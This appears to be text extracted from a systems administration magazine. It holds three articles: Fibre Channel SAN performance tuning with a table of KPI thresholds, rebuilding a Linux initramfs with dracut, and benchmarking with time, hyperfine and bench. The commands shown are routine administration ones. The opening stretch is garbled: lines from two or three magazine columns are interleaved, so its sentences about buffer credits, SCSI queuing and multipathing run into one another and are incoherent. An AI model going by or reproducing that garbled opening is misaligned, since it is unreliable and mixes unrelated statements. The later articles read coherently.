situations. One indicator of this kind cross-location mirroring (e.g., with array sends a Queue_Full or Device_
of bottleneck is the increase in the the Logical Volume Manager) and Busy message back to the connected
zero buffer credit values at the ISL only access both storage systems servers, which triggers a complex
ports. These values indicate how when writing. With a high read rate, recovery mechanism that usually
often units had to wait 2.5μs for this approach immensely reduces ISL affects all servers connected to this
the R_RDY message to arrive before data traffic and thus the risk of poten- front-end port. On the other hand, a
further frames could be sent. If this tial bottlenecks. balanced queue depth configuration
counter grows to a value in the mil- can often tweak that extra share of
lions within a few minutes, caution Overcrowded Queue server and storage performance out
is advised. In such critical cases, the of the systems. If the mapped serv-
counters for “link resets” and “C3
Slows SAN ers or the number of visible LUNs
timeouts” at the affected ISL ports The SCSI protocol also has ways to change significantly, you need to
usually also grow. accelerate data flow. The Command update the calculations to prevent
Queuing and I/O Queuing methods gradual overloading.
Data Rate Mismatches supported by SCSI-3 achieve a sig-
nificant increase in performance. Watch Out for Multipathing
A similar effect as in the previous For example, a server connected to
case can occur if a large volume the SAN can send several SCSI com- Standard operating system settings
of data is transferred at different mands in parallel to the logical unit often lead to an imbalance in data


Watch Out for Multipathing

Standard operating system settings often lead to an imbalance in data traffic, so you will want to pay attention to Fibre Channel multipathing of servers, wherein only one of several connections is actively used. This imbalance then extends to the SAN and ultimately to the storage array. Potential performance bottlenecks occur far more frequently in such constellations. Modern storage systems today use active-active mode over all available controllers and ports. You will want to leverage these capabilities for the benefit of your environment.
Sometimes the use of vendor-specific multipathing drivers can be expedient. These drivers are typically slightly better suited to the capabilities of the storage array, have more specific options, and are often better suited for monitoring than standard operating system drivers. On the other hand, if you want to keep your servers regularly patched, a certain version maintenance and compatibility check overhead can be a result of such third-party software.

Optimizing Data Streams with QoS

Service providers who simultaneously support many different customers with many performance-hungry applications in their storage environments need to ensure that mission-critical applications are assigned the required storage performance in a stable manner at all times. An advantage for one application can be a disadvantage for another. A consistent quality of service (QoS) strategy allows for better planning of data streams and means that critical servers and applications can be prioritized from a performance perspective.
Vendors of storage systems, SAN components, or HBAs have different technical approaches to this problem, but they are not related. In no place here can the data flow be centrally controlled and regulated across all components. Moreover, most solutions do not make a clear distinction between normal operation and failure mode. For example, if performance problems occur within the SAN, the storage system stoically retains its prioritized settings, because it knows nothing about the problem.
Although initial approaches have been made for communication between HBAs and SAN components to act across the board, they only work with newer models and are only available for a few performance metrics. Special HBAs and their drivers support prioritization at the LUN level on the server. The drawback is that you have to set up each individual server, which can be a mammoth task with hundreds of physical servers – not to mention the effort of large-scale server virtualization.
Various options also exist for prioritizing I/Os for SAN components. Basically, the data stream could be directed through the SAN with the use of virtual fabrics or virtual SANs (e.g., to separate test and production systems or individual customers logically from each other). However, this method is not well suited for a more granular distribution of important applications, because the administrative overhead and technical limitations speak against it. For this purpose, it is possible to route servers through the SAN through specially prioritized zones in the data flow. In this way, the frames of high-priority zones receive the right of way and are preferred in the event of a bottleneck.
On the storage systems themselves, QoS functionalities have been established for some time and are therefore the most developed. Depending on the manufacturer or model, data throughput can be limited in terms of megabytes or I/O operations per second for individual LUNs, pools, or servers – or, in return, prioritized at the same level. Such functions require permanent performance monitoring, which is usually available under a free license with modern storage systems. Depending on the setting options, less prioritized data is then permanently throttled or only sent to the back of the queue if a bottleneck situation is looming on the horizon.
However, be aware that applications in a dynamic IT landscape lose priority during their life cycle and that you will have to adjust the settings associated with them time and time again. Whether you're prioritizing storage, SAN, or servers, you should always choose only one of these three levels at which you control the data stream; otherwise, you could easily lose track in the event of a performance problem.

Table 1: Key Fibre Channel SAN Performance Parameters

Parameter | Measuring Point | Recommended Value
SAN-ISL port buffer-to-buffer zero counter | ISL ports on SAN switch or director | <1,000,000 within 5 minutes
Server LUN queue depth | HBA driver | 1-32, depending on the number of LUNs at the front-end port
SAN-ISL data throughput | ISL ports on SAN switch or director | <80% of maximum data throughput
Server I/O response time (average) | Server operating system, volume manager | <10ms
Storage system processors | Storage system | <70%-80%
Storage system front-end port data throughput | Storage system | <80%-90%
Storage system cache write pending rate | Storage system | <30%
Storage system LUN I/O service time (average) | Storage system | <10ms
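For a quick server-side spot check against the 10ms response time guideline in the table, a few lines of shell are often enough. The following is only a minimal sketch: it assumes a Linux host with a sysstat version whose iostat -x output provides the r_await and w_await columns, and the 10ms threshold is the guideline value from Table 1, not a universal constant:

# Flag block devices whose average read or write latency exceeds 10ms,
# using one 5-second extended sample and skipping the since-boot summary (-y).
iostat -dxy 5 1 | awk '
  /Device/ { for (i = 1; i <= NF; i++) col[$i] = i; next }   # map header names to columns
  NF > 1 && col["r_await"] {
    if ($col["r_await"] > 10 || $col["w_await"] > 10)
      printf "WARN %s: r_await=%sms w_await=%sms\n", $1, $col["r_await"], $col["w_await"]
  }'

The same idea extends to the other rows of the table if your SAN switches and storage arrays can export their counters through SNMP, SMI-S, or a REST API.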


Determining Critical Performance KPIs

The basis for the efficient provision of SAN capacities is good, permanent monitoring of all important SAN performance indicators. You should know your key performance indicators (KPIs) and document these values over a long period of time. Whether you work with vendor performance tools or with higher level central monitoring software that queries the available interfaces (e.g., SNMP, SMI-S, or REST API), defining KPIs for servers, SAN, and storage is decisive. On the server side, the response times or I/O wait times of the LUNs or disks are certainly an important factor, but the data throughput (MBps) for the connected HBAs also can be helpful.

Within the SAN you need to pay special attention to all ISL connections, because often a bottleneck in data throughput occurs, or, as described, buffer credits are missing. Alerts are also conceivable for all SAN ports when 80 or 90 percent of the maximum data throughput rate is reached, which you can use to monitor all HBAs and storage ports for this metric. However, you should be a little more conservative with the monitoring parameters and feel your way forward slowly. Experience has shown that approaching bottlenecks are often overlooked if too many alerts are regularly received and have to be checked manually.

Optimizing Array Performance

For a storage array, the load on the front-end processors, the cache write pending rate, and the response times of all LUNs presented to the servers are important values you will want to monitor. In the case of the LUN response times, however, you need to differentiate between random and sequential access, because the block sizes of the two access types differ considerably. For example, sequential processing within a storage array often takes far longer than random processing because of the larger block size, and this difference is reflected in response time.

Many of the values in the storage array differ depending on the system architecture and cannot be set across the board; you will need to contact the vendor to find out at which utilization level a component’s performance is likely to be impaired and inquire about further critical measuring points, as well. Various vendor tools offer preset limits based on best practices, which can also be adapted to your own requirements.

Additionally, when planning the growth of your environment, make sure that if a central component (e.g., an HBA on the server, a SAN switch, or a cache or processor board) fails, the storage array can continue to work without problems and the failure does not lead to a massive impairment of operations or even to outages of individual applications.

Equipped for Emergencies

Even if you are familiar with the SAN infrastructure and have set up appropriate monitoring at key points (Table 1), performance bottlenecks cannot be completely ruled out. A component failure, a driver problem, or a faulty Fibre Channel cable can cause sudden problems. If such an incident occurs and important applications are affected, it is important to gain a quick overview of the essential performance parameters of the infrastructure. Therefore, it is very helpful if you have the relevant values from unrestricted normal operation as a baseline to compare with the current values of the problem situation.

This comparison would reveal, for example, whether performance-hungry servers or applications are suddenly generating 30 percent more I/O operations after software updates and affecting other servers in the same environment as noisy neighbors, or whether I/O operations can no longer be processed by individual connections because of defective components or cables. However, you need to gain experience in the handling and interpretation of the performance indicators from these tools to be sufficiently prepared for genuine problems. Storage is often mistakenly suspected of being the source of performance problems.

If you can make a well-founded and verifiable statement about the load situation of your SAN environment within a few minutes and precisely put your finger on the overload situation and its causes – or provide contrary evidence, backed up with well-founded figures that help to discover where the problem is arising – you will leave observers with a positive impression.

Conclusions

Given compliance with a few important rules and monitoring in the right places, even large Fibre Channel storage networks can be operated with great performance and stability. If you give priority to the most important applications at a suitable point, you can keep them available even in the event of a problem. If you are also trained in the use of performance tools and have the values from normal operation as a reference, the causes of performance problems can often be identified very quickly.


Rebuilding the Linux ramdisk

A New Beginning
If your Linux system is failing to boot, the dracut tool can be a convenient way to build a new ramdisk.
By Thorsten Scherf

After moving your hard disk to a new system, the Linux system suddenly fails to boot. Often this happens because of missing drivers in the ramdisk, which the kernel needs to boot the system. In this article, I take a closer look at the handling of the initramfs file and introduce dracut [1] as a practical helper.

Many users only see the initramfs (initial random access memory filesystem) archive file as yet another file in the boot directory. It is automatically created when a new kernel is installed and deleted again when the kernel is removed from the system. But this initial ramdisk plays an important role, since it ensures that the root filesystem can be accessed after the computer has been restarted, to be able to access all the tools that are necessary for the computer to continue booting.

The GRUB2 bootloader, used in most cases today, is responsible for loading the Linux kernel (vmlinuz) and a ramdisk (initramfs) into memory at boot time. The kernel then mounts the ramdisk on the system as a root volume and then starts the actual init process. On current Linux systems, this is typically systemd. The init process can then use the drivers and programs provided by initramfs to gain access to the root volume itself. The root volume is usually available on a local block device but can also be mounted over the network, if required. For this to work, all the required drivers must, of course, be available in the initramfs. These can be drivers for LVM, RAID, the filesystem, the network, or a variety of other components. The details of this depend on the individual configuration of the system. For example, if the root filesystem is located on an encrypted partition, the tools for accessing it must be available within the ramdisk.

When installing a new kernel, the ramdisk is automatically created and installed based on the system properties. On RPM-based distributions, for example, the new-kernel-pkg tool is used; it is called automatically as part of the kernel installation. By default, the ramdisk resides alongside the kernel in the /boot directory, and a new entry for the bootloader is created so that, after a reboot, the new kernel loads with the appropriate initramfs.

You can view the contents of the ramdisk with the cpio tool. The associated file is simply a cpio archive, but lsinitrd gives you a more elegant and convenient approach:

lsinitrd /boot/initramfs-$(uname -r).img | less

If you are only interested in the kernel drivers provided by this ramdisk, you can restrict the output:

lsinitrd /boot/initramfs-$(uname -r).img | grep -o '/kernel/drivers/.*xz'

The command in Listing 1 tells the tool to display only the available network card drivers.

Listing 1: Available Network Card Drivers

lsinitrd /boot/initramfs-$(uname -r).img | grep -o '/kernel/drivers/net/.*xz'
/kernel/drivers/net/ethernet/broadcom/bnx2x/bnx2x.ko.xz
/kernel/drivers/net/ethernet/broadcom/cnic.ko.xz
/kernel/drivers/net/mdio.ko.xz

Support from dracut

In some cases, you may now need to create a new ramdisk manually. For example, if you want it to support new hardware or allow access to a newly encrypted volume, you have no alternative but to create a new initramfs for the current kernel.


The easiest way to do this is to use the dracut tool, which is a framework that provides specific functions within an initial ramdisk based on modules. On a Fedora system these modules are located in the /usr/lib/dracut/modules.d/ directory. For Linux veterans, dracut also offers a wrapper named mkinitrd, but it is far less flexible than calling dracut directly. To create a new initramfs archive, just run the following command in the simplest case:

dracut --force /boot/initramfs-$(uname -r).img

The tool uses host-only mode by default and overwrites the existing initramfs file if the --force option is set. In this mode, dracut only uses the modules and drivers needed for the operation of the local system. If you plan to use the hard disk in a new system in the future, disable host-only mode as follows:

dracut --no-hostonly /boot/initramfs-$(uname -r)-new.img

The fact that dracut now writes far more data into the initramfs file is easily seen by comparing the sizes of the two files (Listing 2).

Listing 2: File Size Comparison

ls -ls /boot/initramfs-$(uname -r)*.img
24350 -rw-------. 1 root root 24932655 Apr 16 16:01 /boot/initramfs-4.20.10-200.fc29.x86_64.img
69242 -rw-------. 1 root root 70901695 Apr 16 16:04 /boot/initramfs-4.20.10-200.fc29.x86_64-new.img

The following command shows which modules – and thus functions – dracut provides:

dracut --list-modules

If you want to use a new ramdisk on a system on which the Clevis encryption framework is required to enable access to the root partition, the matching dracut module needs to be included in the initramfs file. The output from dracut --list-modules should first confirm that dracut is familiar with the Clevis module. If this is the case, include the module in the initramfs archive as follows:

dracut --add clevis /boot/initramfs-$(uname -r)-clevis.img

The following call should confirm that the files belonging to the Clevis module are now part of the initramfs:

lsinitrd /boot/initramfs-$(uname -r)-clevis.img | grep clevis

To include a specific kernel driver in the initramfs, you can use the command:

dracut --add-drivers bnx2x /boot/initramfs-$(uname -r)-bnx2x.img

Here, too, the call to lsinitrd should confirm that the drivers are in place in the archive. Which drivers or modules are required, of course, depends on the system on which the initramfs is to be used.

By default, dracut always creates an initramfs archive for the kernel currently in use. In some cases, it may be necessary to create the archive file for a different kernel version. This is easily done if the desired kernel version is specified with the --kver option when calling dracut (Listing 3).

Listing 3: Specify Kernel Version

dracut --kver 3.10.0-957.el7.x86_64 /boot/initramfs-$(uname -r)-other-kernel.img
ls -l /boot/initramfs-3.10.0-957.el7.x86_64.img
-rw-------. 1 root root 22913501 Apr 14 11:00 /boot/initramfs-3.10.0-957.el7.x86_64.img

Troubleshooting the Shell

If the system does not boot as usual and access to the root volume is not possible, dracut provides a shell for troubleshooting, if required. It is a good idea to make the following changes to the bootloader configuration to facilitate troubleshooting. In the bootloader configuration you need to remove the rhgb and quiet entries, if present, to ensure that messages are displayed on the screen when booting.

Additionally, add the rd.shell and rd.debug entries to the kernel line of the bootloader so that dracut starts a corresponding shell in case of an error and outputs further debug messages. The dracut tool also writes the messages to the /run/initramfs/rdsosreport.txt file. Both changes can be made either statically in the bootloader configuration file or by dynamically editing the boot menu entry.
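On RPM-based distributions, one way to make the static change is the grubby helper. Treat the following as a sketch and check your distribution's documentation, because bootloader tooling differs between releases:

grubby --update-kernel=ALL --args="rd.shell rd.debug"    # add the dracut debug options
grubby --update-kernel=ALL --remove-args="rhgb quiet"    # drop the splash and quiet options

Once the problem is solved, the same --remove-args mechanism takes the debug options back out again.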
Conclusions

Thanks to dracut, all the major Linux distributions provide a framework for creating an initial ramdisk. The framework is very flexible, supports booting a system from many different sources, and enables block device abstractions like RAID, LVM device mapper, FCoE, iSCSI, NBD, and NFS. Thanks to its modular structure, the tool can be easily combined with other frameworks to enable, say, automatic decryption of LUKS volumes through Clevis integration.

Info
[1] dracut: [https://dracut.wiki.kernel.org/index.php/Main_Page]


Favorite benchmarking tools

High Definition

We take a look at three benchmarking tool favorites: time, hyperfine, and bench. By Federico Lucifredi

At the Dragon Propulsion Laboratory, we are partial to using the simplest tool that will do the job at hand – particularly when dealing with the inherent complexity that performance measurement (and tuning) brings to the table. Yet that same complexity often requires advanced tooling to resolve the riddles posed by performance questions. I will examine my current benchmarking tool favorites from the simplest to the more sophisticated.

Tempus Fugit

The benchmark archetype is time: simple, easy to use, and well understood by most users. In its purest form, time takes a command as a parameter and times its execution in the real world (real), as well as how much CPU time was allocated in user and kernel (sys) modes:

$ time sleep 1
real 0m1.004s
user 0m0.002s
sys 0m0.001s

What not everyone knows is that the default time command is actually one of the bash-builtins [1]:

$ type time
time is a shell keyword
$ which time
/usr/bin/time

There is time, and then there is GNU time [2]. The standalone binary version sports a few additional capabilities, the most noteworthy being its ability to measure page faults and swapping activity by the tested binary:

$ /usr/bin/time gcc test.c -o test
0.03user 0.01system 0:00.05elapsed 98%CPU (0avgtext+0avgdata 20564maxresident)k
0inputs+40outputs (0major+4475minor)pagefaults 0swaps

The sixth Dojo was dedicated to GNU time’s amazing capabilities, and I invite you to read up in your prized archive of ADMIN back issues [3]. Table 1 sums up the capabilities of this versatile tool, which include memory use, basic network benchmarks (packet counts), filesystem I/O operations (read and write counts), and page faults, both minor (MMU) and major (disk access).

Table 1: Format Specifiers*

Option | Function
C | Image name and command-line arguments (argv)
D | Average size of the process’s unshared data area (KB)
E | Wall clock time used by the process ([hours:]minutes:seconds)
F | Number of major page faults (requiring I/O) incurred
I | Number of filesystem inputs
K | Average total (data + stack + text) memory use of the process (KB)
M | Maximum resident set size of the process (KB)
O | Number of filesystem outputs by the process
P | Percentage of the CPU that this job received (user + system divided by running time)
R | Number of minor page faults (not requiring I/O, resolved in RAM)
S | Kernel-mode CPU seconds allocated to the process
U | User-mode CPU seconds allocated to the process
W | Number of times the process was swapped out of main memory
X | Average amount of shared text in the process (KB)
Z | System’s page size (bytes) – this is a system constant
c | Number of times the process was context-switched involuntarily (time slice expired)
e | Wall clock time used by the process (seconds)
k | Number of signals delivered to the process
p | Average unshared stack size of the process
r | Number of socket messages received
s | Number of socket messages sent
t | Average resident set size of the process (KB)
w | Number of times that the program was context-switched voluntarily
x | Exit status of the command
* Available in GNU time, version 1.7 (adapted from the man page).
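The specifiers in Table 1 become useful with the standalone binary's -f (format) option; each letter from the table is prefixed with a percent sign in the format string. The line below is just an illustrative combination of three entries from the table (elapsed seconds, maximum resident set size, and major page faults):

$ /usr/bin/time -f "%e s elapsed, %M KB max RSS, %F major page faults" gcc test.c -o test

Because you define the single output line yourself, a format like this is easy to collect from scripts and compare across runs.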


Going Deeper

Back in issue 12, I mentioned Martin Pool’s promising tool judge [4]. Unfortunately, judge never made it past version 0.1, with its most recent release dated back to 2011. However, Martin’s efforts have an impressive successor in David Peter’s recent hyperfine [5], which is a step up from time when timing a run, because it runs the task a number of times and generates relevant statistics.

Remarkably, the tool takes care of determining how many runs are necessary to generate a statistically valid result automatically on its own recognizance. Normally, it performs 10 runs of the specified command by default, but the minimum number of runs can be tuned manually (-m). Returning again to the same sleep [6] example I used previously, I show a snapshot of the interactive progress report in Figure 1, followed by the final results of the run in Figure 2.

Figure 1: Hyperfine displays progress in real time, which is really handy when managing longer tests.
Figure 2: A summary of results for a very simple example.

In this test, hyperfine sampled 10 runs of a simple delay command, determined an expected value (mean) 1.6ms greater than requested with a standard deviation (sigma) of 0.3ms [7], and reported the range between the minimum and maximum values encountered – handling insubstantial results as well as the appearance of significant outliers. Incongruous data will generate warnings like the following:

Warning: Statistical outliers were detected. Consider re-running this benchmark on a quiet PC without any interferences from other programs.
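Reproducing that kind of measurement takes a single call. The command below is a minimal sketch of the same sleep test, with -m raising the minimum number of runs beyond the default of 10:

$ hyperfine -m 20 'sleep 1'

hyperfine then prints the mean, the standard deviation, and the observed range for the run, much like the summary in Figure 2.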

Very short execution times will lead to warnings requesting a better test and will likely inflate the execution count: Try hyperfine 'ls' to see this happen in practice. The program can be dominated by startup time, or the hot-cache case might not be what you want to measure.

The tool can account for cache warmup runs (--warmup N), and if the opposite behavior is desired, it is just as easy to clear caches before every run by passing the appropriate command (--prepare COMMAND). Exporting the timing results for all runs is also conveniently supported in JSON, CSV, and even Markdown.
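Putting those options together, a comparison of two commands with warmup runs and a Markdown report might look like the following sketch (the commands and file name are arbitrary examples):

$ hyperfine --warmup 3 --export-markdown results.md 'grep -r TODO .' 'rg TODO'

Each command gets its own row in results.md, which makes the numbers easy to paste into a wiki or merge request.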
Bench Test

The bench [8] command also is geared toward statistical analysis of multiple sampling runs, but it provides much less feedback as measurements are being taken. Once samples are obtained, however, the analysis of the results is comprehensive (Figure 3). As with judge, multiple commands can be compared in a single run, but the pièce de résistance of bench is really its ability to generate beautiful charts from the data. Figure 4 makes the case for using bench plain, displaying the report generated by the test in Figure 5. Everything is in one place and ready to share with others on your team.

Figure 3: Bench thoroughly weighs the presence of outliers in the data.
Figure 4: Bench uses a pure HTML canvas to visualize results interactively.
Figure 5: Generating the Figure 4 test report with Bench.

Lack of pre-built packages in the major Linux distributions and the broken builds for macOS [9] found in brew [10] make installing bench less than the ideal experience, but its usefulness more than makes up for the minor inconvenience of having to use Haskell’s stack build system [11] for setup.
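For reference, the build-and-run steps on a typical Linux box look roughly like the sketch below; treat the exact flags as assumptions and double-check them against the project README [8]:

$ stack install bench                   # build bench with Haskell's stack tool [11]
$ bench 'ls' --output report.html       # benchmark a command and write the HTML report

The resulting HTML file is the interactive report shown in Figures 4 and 5.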
Info
[1] bash-builtins (7) man page: [https://manpages.ubuntu.com/manpages/bionic/en/man7/bash-builtins.7.html#see%20also]
[2] time (1) man page: [https://manpages.ubuntu.com/manpages/bionic/en/man1/time.1.html]
[3] “Time Out” by Federico Lucifredi, ADMIN, issue 12, 2012, pg. 96
[4] judge: [http://judge.readthedocs.org/en/latest/]
[5] hyperfine: [https://github.com/sharkdp/hyperfine]
[6] sleep (1) man page: [https://manpages.ubuntu.com/manpages/bionic/en/man1/sleep.1.html]
[7] Standard deviation: [https://en.wikipedia.org/wiki/Standard_deviation]
[8] bench: [https://github.com/Gabriel439/bench]
[9] bench GitHub issue 12: [https://github.com/Gabriel439/bench/issues/12]
[10] Homebrew: [https://brew.sh/]
[11] The Haskell tool stack: [https://docs.haskellstack.org/en/stable/README/]

The Author
Federico Lucifredi (@0xf2) is the Product Management Director for Ceph Storage at Red Hat and was formerly the Ubuntu Server Project Manager at Canonical and the Linux “Systems Management Czar” at SUSE. He enjoys arcane hardware issues and shell-scripting mysteries and takes his McFlurry shaken, not stirred. You can read more from him in the new O’Reilly title AWS System Administration.
